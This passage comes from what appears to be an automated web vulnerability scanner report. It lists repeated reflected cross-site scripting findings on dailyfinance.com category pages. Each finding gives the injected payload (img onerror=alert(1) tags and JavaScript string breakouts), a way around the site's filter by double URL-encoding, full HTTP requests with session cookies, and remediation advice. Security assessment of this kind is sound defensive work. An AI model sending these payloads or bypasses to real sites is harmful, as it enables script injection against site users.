Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f14"><img%20src%3da%20onerror%3dalert(1)>841c29b1427 was submitted in the REST URL parameter 2. This input was echoed as 36f14"><img src=a onerror=alert(1)>841c29b1427 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/columns36f14"><img%20src%3da%20onerror%3dalert(1)>841c29b1427/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9dc7%2522%253b8695b09c20c was submitted in the REST URL parameter 2. This input was echoed as b9dc7";8695b09c20c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/columnsb9dc7%2522%253b8695b09c20c/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.312. http://www.dailyfinance.com/category/columns/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/columns/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f04e"-alert(1)-"1cd293d1ad6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/columns/?6f04e"-alert(1)-"1cd293d1ad6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f21b7%2522%253be170da68d1 was submitted in the REST URL parameter 2. This input was echoed as f21b7";e170da68d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/earningsf21b7%2522%253be170da68d1/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93db"><img%20src%3da%20onerror%3dalert(1)>ba3fb660ed3 was submitted in the REST URL parameter 2. This input was echoed as b93db"><img src=a onerror=alert(1)>ba3fb660ed3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/earningsb93db"><img%20src%3da%20onerror%3dalert(1)>ba3fb660ed3/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Earningsb93db"><img Src=a Onerror=alert(1)>ba3fb660ed3" /> ...[SNIP]...
1.315. http://www.dailyfinance.com/category/earnings/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/earnings/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797d0"-alert(1)-"4f96538448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/earnings/?797d0"-alert(1)-"4f96538448b=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d081b"><img%20src%3da%20onerror%3dalert(1)>58565499139 was submitted in the REST URL parameter 2. This input was echoed as d081b"><img src=a onerror=alert(1)>58565499139 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/economyd081b"><img%20src%3da%20onerror%3dalert(1)>58565499139/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c219%2522%253b291f3c0cc74 was submitted in the REST URL parameter 2. This input was echoed as 4c219";291f3c0cc74 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/economy4c219%2522%253b291f3c0cc74/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.318. http://www.dailyfinance.com/category/economy/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/economy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6005"-alert(1)-"585ac83aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/economy/?e6005"-alert(1)-"585ac83aa79=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd17%2522%253be5f63dbf4f4 was submitted in the REST URL parameter 2. This input was echoed as 1cd17";e5f63dbf4f4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/healthcare1cd17%2522%253be5f63dbf4f4/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86aea"><img%20src%3da%20onerror%3dalert(1)>bffd5453cff was submitted in the REST URL parameter 2. This input was echoed as 86aea"><img src=a onerror=alert(1)>bffd5453cff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/healthcare86aea"><img%20src%3da%20onerror%3dalert(1)>bffd5453cff/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Healthcare86aea"><img Src=a Onerror=alert(1)>bffd5453cff" /> ...[SNIP]...
1.321. http://www.dailyfinance.com/category/healthcare/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/healthcare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f80ed"-alert(1)-"4f4e0ec7734 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/healthcare/?f80ed"-alert(1)-"4f4e0ec7734=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1daba%2522%253b192accb8528 was submitted in the REST URL parameter 2. This input was echoed as 1daba";192accb8528 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/investing1daba%2522%253b192accb8528/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8713e"><img%20src%3da%20onerror%3dalert(1)>61116ef77a1 was submitted in the REST URL parameter 2. This input was echoed as 8713e"><img src=a onerror=alert(1)>61116ef77a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/investing8713e"><img%20src%3da%20onerror%3dalert(1)>61116ef77a1/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Investing8713e"><img Src=a Onerror=alert(1)>61116ef77a1" /> ...[SNIP]...
1.324. http://www.dailyfinance.com/category/investing/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/investing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8e0d"-alert(1)-"a4fa3044bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/investing/?c8e0d"-alert(1)-"a4fa3044bd6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6891"><img%20src%3da%20onerror%3dalert(1)>e949d548e87 was submitted in the REST URL parameter 2. This input was echoed as a6891"><img src=a onerror=alert(1)>e949d548e87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/mediaa6891"><img%20src%3da%20onerror%3dalert(1)>e949d548e87/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dedd%2522%253b4a063b10e17 was submitted in the REST URL parameter 2. This input was echoed as 4dedd";4a063b10e17 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/media4dedd%2522%253b4a063b10e17/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.327. http://www.dailyfinance.com/category/media/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/media/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fd93"-alert(1)-"8ccc6e31a33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/media/?2fd93"-alert(1)-"8ccc6e31a33=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bbb5%2522%253b4d1d44cb5cb was submitted in the REST URL parameter 2. This input was echoed as 2bbb5";4d1d44cb5cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/real-estate2bbb5%2522%253b4d1d44cb5cb/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3815c"><img%20src%3da%20onerror%3dalert(1)>f26efbc5c30 was submitted in the REST URL parameter 2. This input was echoed as 3815c"><img src=a onerror=alert(1)>f26efbc5c30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/real-estate3815c"><img%20src%3da%20onerror%3dalert(1)>f26efbc5c30/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Real Estate3815c"><img Src=a Onerror=alert(1)>f26efbc5c30" /> ...[SNIP]...
1.330. http://www.dailyfinance.com/category/real-estate/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/real-estate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e4d4"-alert(1)-"9461b2061e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
